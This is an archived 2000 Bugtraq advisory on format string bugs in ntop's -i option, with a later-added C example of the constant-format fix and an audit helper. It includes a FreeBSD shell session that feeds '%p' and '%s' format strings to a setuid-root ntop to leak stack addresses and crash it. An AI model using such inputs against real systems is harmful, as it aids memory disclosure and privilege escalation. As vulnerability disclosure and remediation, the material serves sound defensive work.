[17265] in bugtraq


Ksecurity Advisory: ntop format string vulnerability

daemon@ATHENA.MIT.EDU (Ksecurity)
Thu Oct 19 12:41:15 2000

Message-Id:  <20001018084524.2017.qmail@securityfocus.com>
Date:         Wed, 18 Oct 2000 08:45:24 -0000
Reply-To: Ksecurity <ksecurity@ILAND.CO.KR>
From: Ksecurity <ksecurity@ILAND.CO.KR>
To: BUGTRAQ@SECURITYFOCUS.COM


               Ksecurity Advisory
             (Korea security group)

       Subject:         ntop format string vulnerability
       Release Date:    10/17/2000
       Author:          AirPlane (ksecurity@iland.co.kr)
       Platforms:       *nix
       Tested versions: ntop 1.1.pre3, ntop 1.2.a10


I. Background
ntop is a popular utility for monitoring and
summarizing network usage on Unix systems.

II. Summary
ntop 1.1.pre3 and 1.2.a10 are vulnerable to a format
string attack through their -i option.

OpenBSD, FreeBSD and NetBSD include ntop 1.1.pre3 in
their port packages, but it is not installed by default.

On FreeBSD, the ntop port is by default installed
setuid root and is executable only by root and members
of the 'wheel' group.


III. Detailed Description

ntop.c/ntop 1.1.pre3
395:      printf(ebuf);
429:      printf(ebuf);
434:      printf(ebuf);

ntop.c/ntop 1.2.a10
633:      printf(ebuf);
705:      printf(ebuf);
712:      printf(ebuf);
725:      printf(ebuf);

These are standard format string bugs: the ebuf variable
holds the device error message and is passed to printf()
as the format string.

khs% uname -a
FreeBSD khs.AirPlane 4.0-RELEASE FreeBSD 4.0-RELEASE

khs% ls -al /usr/local/sbin/ntop
-r-sr-s--- 1 root wheel 171978 Jul 25 03:45 /usr/local/sbin/ntop

khs% id
uid=1002(user) gid=1002(user) groups=1002(user), 0(wheel)

khs% /usr/local/sbin/ntop -i "%p %p %p %p %p"
ntop v.1.1 MT [i386-unknown-freebsd4.0]
listening on 0x80516ad 0x0 0xbf bff888 0x807d480
Host Act -Rcvd- Sent TCP UDP ICMP 0xbfbff970 
0xbfbff834
0x804a23d 0x3: Device not configured

khs% /usr/local/sbin/ntop -i "%s %s %s %s"
ntop v.1.1 MT [i386-unknown-freebsd4.0] listening on 
5T^h|^h{^hx
Segmentation fault(core dumped)
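
The source-level fix for the printf(ebuf) calls listed above, as an added example that is not part of the original advisory or of ntop's code. fill_ebuf is a constructed stand-in for the routine that writes the device error into ebuf; report_vulnerable, report_fixed, count_conversions and the SHOW_VULNERABLE macro are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the capture-library call that fills ebuf when the
 * device named by -i cannot be opened: the name is copied in verbatim. */
static void fill_ebuf(char *ebuf, size_t n, const char *dev)
{
    snprintf(ebuf, n, "%s: Device not configured", dev);
}

#ifdef SHOW_VULNERABLE  /* hypothetical macro; off so the build stays clean */
/* Pattern from the advisory: ebuf itself is the format string, so every
 * conversion inside the device name reads an argument that was never passed. */
static int report_vulnerable(char *out, size_t n, const char *ebuf)
{
    return snprintf(out, n, ebuf);
}
#endif

/* Fix: constant format string, ebuf passed as data only. */
static int report_fixed(char *out, size_t n, const char *ebuf)
{
    return snprintf(out, n, "%s", ebuf);
}

/* Count conversion specifications in s; "%%" is a literal percent sign.
 * Usable as an audit check on values that end up in error messages. */
static int count_conversions(const char *s)
{
    int count = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%')
            s++;            /* skip the escaped percent */
        else if (s[1] != '\0')
            count++;
    }
    return count;
}

int main(void)
{
    char ebuf[256], out[256];
    fill_ebuf(ebuf, sizeof ebuf, "%p %p %p %p %p");   /* constructed input */
    report_fixed(out, sizeof out, ebuf);
    printf("conversions in ebuf: %d\nprinted: %s\n", count_conversions(ebuf), out);
    return 0;
}
```

Building with -Wformat -Wformat-security makes gcc and clang flag the printf(ebuf) form at compile time.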


IV. Solution
1. chmod u-s path/to/ntop
2. FreeBSD users: read FreeBSD-SA-00:36 (ntop -w
buffer overflow).
3. The ntop 1.3.2 (snapshot) version may not have the
format string bugs.


In OpenBSD land, the pain is quick, at least.
                                             -- Theo de Raadt ;)

Copyright 2000, Ksecurity Project Team
